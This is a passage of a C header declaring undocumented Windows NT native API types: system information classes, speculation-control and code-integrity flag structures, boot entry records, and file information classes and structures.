} PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION, * PPROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;
/*
** Processes END
*/
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemProcessorInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
SystemProcessorPerformanceInformation = 8,
SystemFlagsInformation = 9,
SystemCallTimeInformation = 10,
SystemModuleInformation = 11,
SystemLocksInformation = 12,
SystemStackTraceInformation = 13,
SystemPagedPoolInformation = 14,
SystemNonPagedPoolInformation = 15,
SystemHandleInformation = 16,
SystemObjectInformation = 17,
SystemPageFileInformation = 18,
SystemVdmInstemulInformation = 19,
SystemVdmBopInformation = 20,
SystemFileCacheInformation = 21,
SystemPoolTagInformation = 22,
SystemInterruptInformation = 23,
SystemDpcBehaviorInformation = 24,
SystemFullMemoryInformation = 25,
SystemLoadGdiDriverInformation = 26,
SystemUnloadGdiDriverInformation = 27,
SystemTimeAdjustmentInformation = 28,
SystemSummaryMemoryInformation = 29,
SystemMirrorMemoryInformation = 30,
SystemPerformanceTraceInformation = 31,
SystemObsolete0 = 32,
SystemExceptionInformation = 33,
SystemCrashDumpStateInformation = 34,
SystemKernelDebuggerInformation = 35,
SystemContextSwitchInformation = 36,
SystemRegistryQuotaInformation = 37,
SystemExtendServiceTableInformation = 38,
SystemPrioritySeperation = 39,
SystemVerifierAddDriverInformation = 40,
SystemVerifierRemoveDriverInformation = 41,
SystemProcessorIdleInformation = 42,
SystemLegacyDriverInformation = 43,
SystemCurrentTimeZoneInformation = 44,
SystemLookasideInformation = 45,
SystemTimeSlipNotification = 46,
SystemSessionCreate = 47,
SystemSessionDetach = 48,
SystemSessionInformation = 49,
SystemRangeStartInformation = 50,
SystemVerifierInformation = 51,
SystemVerifierThunkExtend = 52,
SystemSessionProcessInformation = 53,
SystemLoadGdiDriverInSystemSpace = 54,
SystemNumaProcessorMap = 55,
SystemPrefetcherInformation = 56,
SystemExtendedProcessInformation = 57,
SystemRecommendedSharedDataAlignment = 58,
SystemComPlusPackage = 59,
SystemNumaAvailableMemory = 60,
SystemProcessorPowerInformation = 61,
SystemEmulationBasicInformation = 62,
SystemEmulationProcessorInformation = 63,
SystemExtendedHandleInformation = 64,
SystemLostDelayedWriteInformation = 65,
SystemBigPoolInformation = 66,
SystemSessionPoolTagInformation = 67,
SystemSessionMappedViewInformation = 68,
SystemHotpatchInformation = 69,
SystemObjectSecurityMode = 70,
SystemWatchdogTimerHandler = 71,
SystemWatchdogTimerInformation = 72,
SystemLogicalProcessorInformation = 73,
SystemWow64SharedInformationObsolete = 74,
SystemRegisterFirmwareTableInformationHandler = 75,
SystemFirmwareTableInformation = 76,
SystemModuleInformationEx = 77,
SystemVerifierTriageInformation = 78,
SystemSuperfetchInformation = 79,
SystemMemoryListInformation = 80,
SystemFileCacheInformationEx = 81,
SystemThreadPriorityClientIdInformation = 82,
SystemProcessorIdleCycleTimeInformation = 83,
SystemVerifierCancellationInformation = 84,
SystemProcessorPowerInformationEx = 85,
SystemRefTraceInformation = 86,
SystemSpecialPoolInformation = 87,
SystemProcessIdInformation = 88,
SystemErrorPortInformation = 89,
SystemBootEnvironmentInformation = 90,
SystemHypervisorInformation = 91,
SystemVerifierInformationEx = 92,
SystemTimeZoneInformation = 93,
SystemImageFileExecutionOptionsInformation = 94,
SystemCoverageInformation = 95,
SystemPrefetchPatchInformation = 96,
SystemVerifierFaultsInformation = 97,
SystemSystemPartitionInformation = 98,
SystemSystemDiskInformation = 99,
SystemProcessorPerformanceDistribution = 100,
SystemNumaProximityNodeInformation = 101,
SystemDynamicTimeZoneInformation = 102,
SystemCodeIntegrityInformation = 103,
SystemProcessorMicrocodeUpdateInformation = 104,
SystemProcessorBrandString = 105,
SystemVirtualAddressInformation = 106,
SystemLogicalProcessorAndGroupInformation = 107,
SystemProcessorCycleTimeInformation = 108,
SystemStoreInformation = 109,
SystemRegistryAppendString = 110,
SystemAitSamplingValue = 111,
SystemVhdBootInformation = 112,
SystemCpuQuotaInformation = 113,
SystemNativeBasicInformation = 114,
SystemErrorPortTimeouts = 115,
SystemLowPriorityIoInformation = 116,
SystemBootEntropyInformation = 117,
SystemVerifierCountersInformation = 118,
SystemPagedPoolInformationEx = 119,
SystemSystemPtesInformationEx = 120,
SystemNodeDistanceInformation = 121,
SystemAcpiAuditInformation = 122,
SystemBasicPerformanceInformation = 123,
SystemQueryPerformanceCounterInformation = 124,
SystemSessionBigPoolInformation = 125,
SystemBootGraphicsInformation = 126,
SystemScrubPhysicalMemoryInformation = 127,
SystemBadPageInformation = 128,
SystemProcessorProfileControlArea = 129,
SystemCombinePhysicalMemoryInformation = 130,
SystemEntropyInterruptTimingInformation = 131,
SystemConsoleInformation = 132,
SystemPlatformBinaryInformation = 133,
SystemPolicyInformation = 134,
SystemHypervisorProcessorCountInformation = 135,
SystemDeviceDataInformation = 136,
SystemDeviceDataEnumerationInformation = 137,
SystemMemoryTopologyInformation = 138,
SystemMemoryChannelInformation = 139,
SystemBootLogoInformation = 140,
SystemProcessorPerformanceInformationEx = 141,
SystemSpare0 = 142,
SystemSecureBootPolicyInformation = 143,
SystemPageFileInformationEx = 144,
SystemSecureBootInformation = 145,
SystemEntropyInterruptTimingRawInformation = 146,
SystemPortableWorkspaceEfiLauncherInformation = 147,
SystemFullProcessInformation = 148,
SystemKernelDebuggerInformationEx = 149,
SystemBootMetadataInformation = 150,
SystemSoftRebootInformation = 151,
SystemElamCertificateInformation = 152,
SystemOfflineDumpConfigInformation = 153,
SystemProcessorFeaturesInformation = 154,
SystemRegistryReconciliationInformation = 155,
SystemEdidInformation = 156,
SystemManufacturingInformation = 157,
SystemEnergyEstimationConfigInformation = 158,
SystemHypervisorDetailInformation = 159,
SystemProcessorCycleStatsInformation = 160,
SystemVmGenerationCountInformation = 161,
SystemTrustedPlatformModuleInformation = 162,
SystemKernelDebuggerFlags = 163,
SystemCodeIntegrityPolicyInformation = 164,
SystemIsolatedUserModeInformation = 165,
SystemHardwareSecurityTestInterfaceResultsInformation = 166,
SystemSingleModuleInformation = 167,
SystemAllowedCpuSetsInformation = 168,
SystemVsmProtectionInformation = 169, //ex SystemDmaProtectionInformation
SystemInterruptCpuSetsInformation = 170,
SystemSecureBootPolicyFullInformation = 171,
SystemCodeIntegrityPolicyFullInformation = 172,
SystemAffinitizedInterruptProcessorInformation = 173,
SystemRootSiloInformation = 174,
SystemCpuSetInformation = 175,
SystemCpuSetTagInformation = 176,
SystemWin32WerStartCallout = 177,
SystemSecureKernelProfileInformation = 178,
SystemCodeIntegrityPlatformManifestInformation = 179,
SystemInterruptSteeringInformation = 180,
SystemSupportedProcessorArchitectures = 181,
SystemMemoryUsageInformation = 182,
SystemCodeIntegrityCertificateInformation = 183,
SystemPhysicalMemoryInformation = 184,
SystemControlFlowTransition = 185,
SystemKernelDebuggingAllowed = 186,
SystemActivityModerationExeState = 187,
SystemActivityModerationUserSettings = 188,
SystemCodeIntegrityPoliciesFullInformation = 189,
SystemCodeIntegrityUnlockInformation = 190,
SystemIntegrityQuotaInformation = 191,
SystemFlushInformation = 192,
SystemProcessorIdleMaskInformation = 193,
SystemSecureDumpEncryptionInformation = 194,
SystemWriteConstraintInformation = 195,
SystemKernelVaShadowInformation = 196,
SystemHypervisorSharedPageInformation = 197,
SystemFirmwareBootPerformanceInformation = 198,
SystemCodeIntegrityVerificationInformation = 199,
SystemFirmwarePartitionInformation = 200,
SystemSpeculationControlInformation = 201,
SystemDmaGuardPolicyInformation = 202,
SystemEnclaveLaunchControlInformation = 203,
SystemWorkloadAllowedCpuSetsInformation = 204,
SystemCodeIntegrityUnlockModeInformation = 205,
SystemLeapSecondInformation = 206,
SystemFlags2Information = 207,
SystemSecurityModelInformation = 208,
SystemCodeIntegritySyntheticCacheInformation = 209,
SystemFeatureConfigurationInformation = 210,
SystemFeatureConfigurationSectionInformation = 211,
SystemFeatureUsageSubscriptionInformation = 212,
SystemSecureSpeculationControlInformation = 213,
SystemSpacesBootInformation = 214,
SystemFwRamdiskInformation = 215,
SystemWheaIpmiHardwareInformation = 216,
SystemDifSetRuleClassInformation = 217,
SystemDifClearRuleClassInformation = 218,
SystemDifApplyPluginVerificationOnDriver = 219,
SystemDifRemovePluginVerificationOnDriver = 220,
SystemShadowStackInformation = 221,
SystemBuildVersionInformation = 222,
SystemPoolLimitInformation = 223,
SystemCodeIntegrityAddDynamicStore = 224,
SystemCodeIntegrityClearDynamicStores = 225,
SystemDifPoolTrackingInformation = 226,
SystemPoolZeroingInformation = 227,
SystemDpcWatchdogInformation = 228,
SystemDpcWatchdogInformation2 = 229,
SystemSupportedProcessorArchitectures2 = 230,
SystemSingleProcessorRelationshipInformation = 231,
SystemXfgCheckFailureInformation = 232,
SystemIommuStateInformation = 233,
SystemHypervisorMinrootInformation = 234,
SystemHypervisorBootPagesInformation = 235,
SystemPointerAuthInformation = 236,
SystemSecureKernelDebuggerInformation = 237,
SystemOriginalImageFeatureInformation = 238,
SystemMemoryNumaInformation = 239,
SystemMemoryNumaPerformanceInformation = 240,
SystemCodeIntegritySignedPoliciesFullInformation = 241,
SystemSecureSecretsInformation = 242,
SystemTrustedAppsRuntimeInformation = 243,
SystemBadPageInformationEx = 244,
SystemResourceDeadlockTimeout = 245,
SystemBreakOnContextUnwindFailureInformation = 246,
SystemOslRamdiskInformation = 247,
SystemCodeIntegrityPolicyManagementInformation = 248,
SystemMemoryNumaCacheInformation = 249,
SystemProcessorFeaturesBitMapInformation = 250,
SystemRefTraceInformationEx = 251,
SystemBasicProcessInformation = 252,
SystemHandleCountInformation = 253,
MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_VSM_PROTECTION_INFORMATION {
CHAR DmaProtectionsAvailable;
CHAR DmaProtectionsInUse;
CHAR HardwareMbecAvailable;
CHAR ApicVirtualizationAvailable;
} SYSTEM_VSM_PROTECTION_INFORMATION, * PSYSTEM_VSM_PROTECTION_INFORMATION;
//msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx
typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
union {
ULONG Flags;
struct {
ULONG BpbEnabled : 1;
ULONG BpbDisabledSystemPolicy : 1;
ULONG BpbDisabledNoHardwareSupport : 1;
ULONG SpecCtrlEnumerated : 1;
ULONG SpecCmdEnumerated : 1;
ULONG IbrsPresent : 1;
ULONG StibpPresent : 1;
ULONG SmepPresent : 1;
ULONG SpeculativeStoreBypassDisableAvailable : 1;
ULONG SpeculativeStoreBypassDisableSupported : 1;
ULONG SpeculativeStoreBypassDisabledSystemWide : 1;
ULONG SpeculativeStoreBypassDisabledKernel : 1;
ULONG SpeculativeStoreBypassDisableRequired : 1;
ULONG BpbDisabledKernelToUser : 1;
ULONG SpecCtrlRetpolineEnabled : 1;
ULONG SpecCtrlImportOptimizationEnabled : 1;
ULONG EnhancedIbrs : 1;
ULONG HvL1tfStatusAvailable : 1;
ULONG HvL1tfProcessorNotAffected : 1;
ULONG HvL1tfMigitationEnabled : 1;
ULONG HvL1tfMigitationNotEnabled_Hardware : 1;
ULONG HvL1tfMigitationNotEnabled_LoadOption : 1;
ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1;
ULONG EnhancedIbrsReported : 1;
ULONG MdsHardwareProtected : 1;
ULONG MbClearEnabled : 1;
ULONG MbClearReported : 1;
ULONG TsxCtrlStatus : 2;
ULONG TsxCtrlReported : 1;
ULONG TaaHardwareImmune : 1;
ULONG Reserved : 1;
} SpeculationControlFlags;
};
} SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION;
typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION_V2 {
union {
ULONG Flags;
struct {
ULONG BpbEnabled : 1;
ULONG BpbDisabledSystemPolicy : 1;
ULONG BpbDisabledNoHardwareSupport : 1;
ULONG SpecCtrlEnumerated : 1;
ULONG SpecCmdEnumerated : 1;
ULONG IbrsPresent : 1;
ULONG StibpPresent : 1;
ULONG SmepPresent : 1;
ULONG SpeculativeStoreBypassDisableAvailable : 1;
ULONG SpeculativeStoreBypassDisableSupported : 1;
ULONG SpeculativeStoreBypassDisabledSystemWide : 1;
ULONG SpeculativeStoreBypassDisabledKernel : 1;
ULONG SpeculativeStoreBypassDisableRequired : 1;
ULONG BpbDisabledKernelToUser : 1;
ULONG SpecCtrlRetpolineEnabled : 1;
ULONG SpecCtrlImportOptimizationEnabled : 1;
ULONG EnhancedIbrs : 1;
ULONG HvL1tfStatusAvailable : 1;
ULONG HvL1tfProcessorNotAffected : 1;
ULONG HvL1tfMigitationEnabled : 1;
ULONG HvL1tfMigitationNotEnabled_Hardware : 1;
ULONG HvL1tfMigitationNotEnabled_LoadOption : 1;
ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1;
ULONG EnhancedIbrsReported : 1;
ULONG MdsHardwareProtected : 1;
ULONG MbClearEnabled : 1;
ULONG MbClearReported : 1;
ULONG TsxCtrlStatus : 2;
ULONG TsxCtrlReported : 1;
ULONG TaaHardwareImmune : 1;
ULONG Reserved : 1;
} SpeculationControlFlags;
};
union {
ULONG Flags2;
struct {
ULONG SbdrSsdpHardwareProtected : 1;
ULONG FbsdpHardwareProtected : 1;
ULONG PsdpHardwareProtected : 1;
ULONG FbClearEnabled : 1;
ULONG FbClearReported : 1;
ULONG BhbEnabled : 1;
ULONG BhbDisabledSystemPolicy : 1;
ULONG BhbDisabledNoHardwareSupport : 1;
ULONG BranchConfusionStatus : 2;
ULONG BranchConfusionReported : 1;
ULONG RdclHardwareProtectedReported : 1;
ULONG RdclHardwareProtected : 1;
ULONG Reserved3 : 4;
ULONG Reserved4 : 3;
ULONG DivideByZeroReported : 1;
ULONG DivideByZeroStatus : 1;
ULONG Reserved5 : 3;
ULONG Reserved : 7;
} SpeculationControlFlags2;
};
} SYSTEM_SPECULATION_CONTROL_INFORMATION_V2, * PSYSTEM_SPECULATION_CONTROL_INFORMATION_V2;
typedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION {
union {
ULONG Flags;
struct {
ULONG KvaShadowEnabled : 1;
ULONG KvaShadowUserGlobal : 1;
ULONG KvaShadowPcid : 1;
ULONG KvaShadowInvpcid : 1;
ULONG KvaShadowRequired : 1;
ULONG KvaShadowRequiredAvailable : 1;
ULONG InvalidPteBit : 6;
ULONG L1DataCacheFlushSupported : 1;
ULONG L1TerminalFaultMitigationPresent : 1;
ULONG Reserved : 18;
} KvaShadowFlags;
};
} SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION;
typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
ULONG Length;
ULONG CodeIntegrityOptions;
} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
#define CODEINTEGRITY_OPTION_ENABLED 0x01
#define CODEINTEGRITY_OPTION_TESTSIGN 0x02
#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x04
#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x08
#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x10
#define CODEINTEGRITY_OPTION_TEST_BUILD 0x20
#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x40
#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x80
#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x100
#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x200
#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x400
#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x800
#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
#define CODEINTEGRITY_OPTION_WHQL_ENFORCEMENT_ENABLED 0x4000
#define CODEINTEGRITY_OPTION_WHQL_AUDITMODE_ENABLED 0x8000
typedef struct _HV_DETAILS {
ULONG Data[4];
} HV_DETAILS, * PHV_DETAILS;
typedef struct _HV_VENDOR_AND_MAX_FUNCTION {
ULONG MaxFunction;
CHAR VendorName[12];
} HV_VENDOR_AND_MAX_FUNCTION, * PHV_VENDOR_AND_MAX_FUNCTION;
typedef struct _SYSTEM_HYPERVISOR_DETAIL_INFORMATION {
HV_DETAILS HvVendorAndMaxFunction;
HV_DETAILS HypervisorInterface;
HV_DETAILS HypervisorVersion;
HV_DETAILS HvFeatures;
HV_DETAILS HwFeatures;
HV_DETAILS EnlightenmentInfo;
HV_DETAILS ImplementationLimits;
} SYSTEM_HYPERVISOR_DETAIL_INFORMATION, * PSYSTEM_HYPERVISOR_DETAIL_INFORMATION;
typedef struct _SYSTEM_HYPERVISOR_QUERY_INFORMATION {
BOOLEAN HypervisorConnected;
BOOLEAN HypervisorDebuggingEnabled;
BOOLEAN HypervisorPresent;
BOOLEAN Spare0[5];
ULONGLONG EnabledEnlightenments;
} SYSTEM_HYPERVISOR_QUERY_INFORMATION, * PSYSTEM_HYPERVISOR_QUERY_INFORMATION;
typedef VOID(NTAPI *PIO_APC_ROUTINE)(
_In_ PVOID ApcContext,
_In_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG Reserved
);
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
typedef struct _SYSTEM_VHD_BOOT_INFORMATION {
BOOLEAN OsDiskIsVhd;
ULONG OsVhdFilePathOffset;
WCHAR OsVhdParentVolume[ANYSIZE_ARRAY];
} SYSTEM_VHD_BOOT_INFORMATION, *PSYSTEM_VHD_BOOT_INFORMATION;
typedef struct _SYSTEM_OBJECTTYPE_INFORMATION {
ULONG NextEntryOffset;
ULONG NumberOfObjects;
ULONG NumberOfHandles;
ULONG TypeIndex;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
ULONG PoolType;
BOOLEAN SecurityRequired;
BOOLEAN WaitableObject;
UNICODE_STRING TypeName;
} SYSTEM_OBJECTTYPE_INFORMATION, *PSYSTEM_OBJECTTYPE_INFORMATION;
typedef struct _SYSTEM_OBJECT_INFORMATION {
ULONG NextEntryOffset;
PVOID Object;
HANDLE CreatorUniqueProcess;
USHORT CreatorBackTraceIndex;
USHORT Flags;
LONG PointerCount;
LONG HandleCount;
ULONG PagedPoolCharge;
ULONG NonPagedPoolCharge;
HANDLE ExclusiveProcessId;
PVOID SecurityDescriptor;
UNICODE_STRING NameInfo;
} SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION;
/*
** Boot Entry START
*/
typedef struct _FILE_PATH {
ULONG Version;
ULONG Length;
ULONG Type;
UCHAR FilePath[ANYSIZE_ARRAY];
} FILE_PATH, *PFILE_PATH;
typedef struct _BOOT_ENTRY {
ULONG Version;
ULONG Length;
ULONG Id;
ULONG Attributes;
ULONG FriendlyNameOffset;
ULONG BootFilePathOffset;
ULONG OsOptionsLength;
UCHAR OsOptions[ANYSIZE_ARRAY];
} BOOT_ENTRY, *PBOOT_ENTRY;
typedef struct _BOOT_ENTRY_LIST {
ULONG NextEntryOffset;
BOOT_ENTRY BootEntry;
} BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST;
/*
** Boot Entry END
*/
/*
** File start
*/
#define FILE_SUPERSEDE 0x00000000
#define FILE_OPEN 0x00000001
#define FILE_CREATE 0x00000002
#define FILE_OPEN_IF 0x00000003
#define FILE_OVERWRITE 0x00000004
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_MAXIMUM_DISPOSITION 0x00000005
#define FILE_DIRECTORY_FILE 0x00000001
#define FILE_WRITE_THROUGH 0x00000002
#define FILE_SEQUENTIAL_ONLY 0x00000004
#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_NON_DIRECTORY_FILE 0x00000040
#define FILE_CREATE_TREE_CONNECTION 0x00000080
#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
#define FILE_NO_EA_KNOWLEDGE 0x00000200
#define FILE_OPEN_FOR_RECOVERY 0x00000400
#define FILE_RANDOM_ACCESS 0x00000800
#define FILE_DELETE_ON_CLOSE 0x00001000
#define FILE_OPEN_BY_FILE_ID 0x00002000
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#define FILE_NO_COMPRESSION 0x00008000
#define FILE_RESERVE_OPFILTER 0x00100000
#define FILE_OPEN_REPARSE_POINT 0x00200000
#define FILE_OPEN_NO_RECALL 0x00400000
#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
#define FILE_COPY_STRUCTURED_STORAGE 0x00000041
#define FILE_STRUCTURED_STORAGE 0x00000441
#define FILE_VALID_OPTION_FLAGS 0x00ffffff
#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032
#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032
#define FILE_VALID_SET_FLAGS 0x00000036
typedef enum _FILE_INFORMATION_CLASS {
FileDirectoryInformation = 1,
FileFullDirectoryInformation,
FileBothDirectoryInformation,
FileBasicInformation,
FileStandardInformation,
FileInternalInformation,
FileEaInformation,
FileAccessInformation,
FileNameInformation,
FileRenameInformation,
FileLinkInformation,
FileNamesInformation,
FileDispositionInformation,
FilePositionInformation,
FileFullEaInformation,
FileModeInformation,
FileAlignmentInformation,
FileAllInformation,
FileAllocationInformation,
FileEndOfFileInformation,
FileAlternateNameInformation,
FileStreamInformation,
FilePipeInformation,
FilePipeLocalInformation,
FilePipeRemoteInformation,
FileMailslotQueryInformation,
FileMailslotSetInformation,
FileCompressionInformation,
FileObjectIdInformation,
FileCompletionInformation,
FileMoveClusterInformation,
FileQuotaInformation,
FileReparsePointInformation,
FileNetworkOpenInformation,
FileAttributeTagInformation,
FileTrackingInformation,
FileIdBothDirectoryInformation,
FileIdFullDirectoryInformation,
FileValidDataLengthInformation,
FileShortNameInformation,
FileIoCompletionNotificationInformation,
FileIoStatusBlockRangeInformation,
FileIoPriorityHintInformation,
FileSfioReserveInformation,
FileSfioVolumeInformation,
FileHardLinkInformation,
FileProcessIdsUsingFileInformation,
FileNormalizedNameInformation,
FileNetworkPhysicalNameInformation,
FileIdGlobalTxDirectoryInformation,
FileIsRemoteDeviceInformation,
FileUnusedInformation,
FileNumaNodeInformation,
FileStandardLinkInformation,
FileRemoteProtocolInformation,
FileRenameInformationBypassAccessCheck,
FileLinkInformationBypassAccessCheck,
FileVolumeNameInformation,
FileIdInformation,
FileIdExtdDirectoryInformation,
FileReplaceCompletionInformation,
FileHardLinkFullIdInformation,
FileIdExtdBothDirectoryInformation,
FileDispositionInformationEx,
FileRenameInformationEx,
FileRenameInformationExBypassAccessCheck,
FileDesiredStorageClassInformation,
FileStatInformation,
FileMemoryPartitionInformation,
FileStatLxInformation,
FileCaseSensitiveInformation,
FileLinkInformationEx,
FileLinkInformationExBypassAccessCheck,
FileStorageReserveIdInformation,
FileCaseSensitiveInformationForceAccessCheck,
FileKnownFolderInformation,
FileStatBasicInformation,
FileId64ExtdDirectoryInformation,
FileId64ExtdBothDirectoryInformation,
FileIdAllExtdDirectoryInformation,
FileIdAllExtdBothDirectoryInformation,
FileStreamReservationInformation,
FileMaximumInformation
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
typedef enum _FSINFOCLASS {
FileFsVolumeInformation = 1,
FileFsLabelInformation,
FileFsSizeInformation,
FileFsDeviceInformation,
FileFsAttributeInformation,
FileFsControlInformation,
FileFsFullSizeInformation,
FileFsObjectIdInformation,
FileFsDriverPathInformation,
FileFsVolumeFlagsInformation,
FileFsSectorSizeInformation,
FileFsDataCopyInformation,
FileFsMetadataSizeInformation,
FileFsFullSizeInformationEx,
FileFsGuidInformation,
FileFsMaximumInformation
} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;
typedef struct _FILE_BASIC_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
typedef struct _FILE_STANDARD_INFORMATION {
LARGE_INTEGER AllocationSize;
LARGE_INTEGER EndOfFile;
ULONG NumberOfLinks;
UCHAR DeletePending;
UCHAR Directory;
} FILE_STANDARD_INFORMATION;
typedef struct _FILE_STANDARD_INFORMATION_EX {
LARGE_INTEGER AllocationSize;
LARGE_INTEGER EndOfFile;
ULONG NumberOfLinks;
BOOLEAN DeletePending;
BOOLEAN Directory;
BOOLEAN AlternateStream;
BOOLEAN MetadataAttribute;
} FILE_STANDARD_INFORMATION_EX, *PFILE_STANDARD_INFORMATION_EX;
typedef struct _FILE_INTERNAL_INFORMATION {
LARGE_INTEGER IndexNumber;
} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;
typedef struct _FILE_EA_INFORMATION {
ULONG EaSize;
} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;
typedef struct _FILE_ACCESS_INFORMATION {
ACCESS_MASK AccessFlags;
} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;
typedef struct _FILE_POSITION_INFORMATION {
LARGE_INTEGER CurrentByteOffset;
} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;
typedef struct _FILE_MODE_INFORMATION {
ULONG Mode;
} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;
typedef struct _FILE_ALIGNMENT_INFORMATION {
ULONG AlignmentRequirement;
} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;
typedef struct _FILE_NAME_INFORMATION {
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
typedef struct _FILE_ALL_INFORMATION {
FILE_BASIC_INFORMATION BasicInformation;
FILE_STANDARD_INFORMATION StandardInformation;
FILE_INTERNAL_INFORMATION InternalInformation;
FILE_EA_INFORMATION EaInformation;
FILE_ACCESS_INFORMATION AccessInformation;
FILE_POSITION_INFORMATION PositionInformation;
FILE_MODE_INFORMATION ModeInformation;
FILE_ALIGNMENT_INFORMATION AlignmentInformation;
FILE_NAME_INFORMATION NameInformation;
} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;
typedef struct _FILE_NETWORK_OPEN_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER AllocationSize;
LARGE_INTEGER EndOfFile;
ULONG FileAttributes;
} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
ULONG FileAttributes;
ULONG ReparseTag;
} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;
typedef struct _FILE_ALLOCATION_INFORMATION {
LARGE_INTEGER AllocationSize;
} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;
typedef struct _FILE_COMPRESSION_INFORMATION {
LARGE_INTEGER CompressedFileSize;
USHORT CompressionFormat;
UCHAR CompressionUnitShift;
UCHAR ChunkShift;
UCHAR ClusterShift;
UCHAR Reserved[3];
} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;
typedef struct _FILE_DISPOSITION_INFORMATION {
BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;
typedef struct _FILE_END_OF_FILE_INFORMATION {
LARGE_INTEGER EndOfFile;
} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;
typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
LARGE_INTEGER ValidDataLength;
} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;
typedef struct _FILE_LINK_INFORMATION {
BOOLEAN ReplaceIfExists;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
typedef struct _FILE_MOVE_CLUSTER_INFORMATION {
ULONG ClusterCount;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION;
typedef struct _FILE_RENAME_INFORMATION {
BOOLEAN ReplaceIfExists;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
typedef struct _FILE_STREAM_INFORMATION {
ULONG NextEntryOffset;
ULONG StreamNameLength;
LARGE_INTEGER StreamSize;
LARGE_INTEGER StreamAllocationSize;
WCHAR StreamName[1];
} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;
typedef struct _FILE_TRACKING_INFORMATION {
HANDLE DestinationFile;
ULONG ObjectInformationLength;
CHAR ObjectInformation[1];
